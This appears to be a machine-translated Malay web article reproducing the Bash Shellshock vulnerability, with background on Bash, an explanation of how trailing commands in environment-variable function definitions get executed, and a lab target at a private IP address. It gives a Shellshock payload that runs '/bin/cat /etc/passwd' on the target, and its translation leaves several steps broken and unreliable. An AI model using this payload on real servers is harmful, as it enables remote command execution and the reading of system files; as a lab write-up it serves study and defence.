Rumah >Operasi dan penyelenggaraan >Keselamatan >Contoh analisis pengulangan kelemahan bash
Bourne Again Shell (pendek kata BASH) ialah pelaksanaan SHELL yang paling popular pada GNU/Linux Ia dilahirkan pada tahun 1980. Selepas beberapa dekad evolusi, ia telah berkembang daripada penterjemah baris perintah terminal untuk disepadukan secara mendalam dengan GNU. sistem antara muka pelbagai fungsi.
Bash, sejenis cangkerang Unix. Versi rasmi pertama dikeluarkan pada tahun 1989. Ia pada asalnya dirancang untuk digunakan pada sistem pengendalian GNU, tetapi ia boleh dijalankan pada kebanyakan sistem pengendalian seperti Unix, termasuk Linux dan Mac OS X v10.4, yang menggunakannya sebagai lalai cangkerang. Ia juga telah dialihkan ke Cygwin dan MinGW pada Microsoft Windows, atau tersedia sebagai projek DJGPP pada MS-DOS. Terdapat juga port pada Novell NetWare dan Android.
Pembolehubah persekitaran yang sedang digunakan oleh Bash dipanggil melalui nama fungsi Apa yang menyebabkan kerentanan ialah selepas pembolehubah persekitaran yang ditakrifkan bermula dengan "(){" dihuraikan ke dalam fungsi dalam perintah ENV, pelaksanaan Bash gagal. Keluar, tetapi teruskan menghuraikan dan melaksanakan perintah shell Alasan utama ialah tiada sempadan ketat dalam penapisan input, dan tiada pertimbangan parameter yang sah dibuat.
Artikel ini hanya merekodkan dan melaksanakan pengulangan kerentanan Proses penggunaan adalah seperti berikut:
1 Persekitaran Kerentanan
Pautan: http://192.168.101.152:8080. /korban. untuk kawalan jauh pelaksanaan Perintah
3 Gunakan proses
untuk mengakses sasaran() { :; }; echo; /bin/cat /etc/passwd
Ejen Pengguna tidak diperlukan
<br>
Atas ialah kandungan terperinci Contoh analisis pengulangan kelemahan bash. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!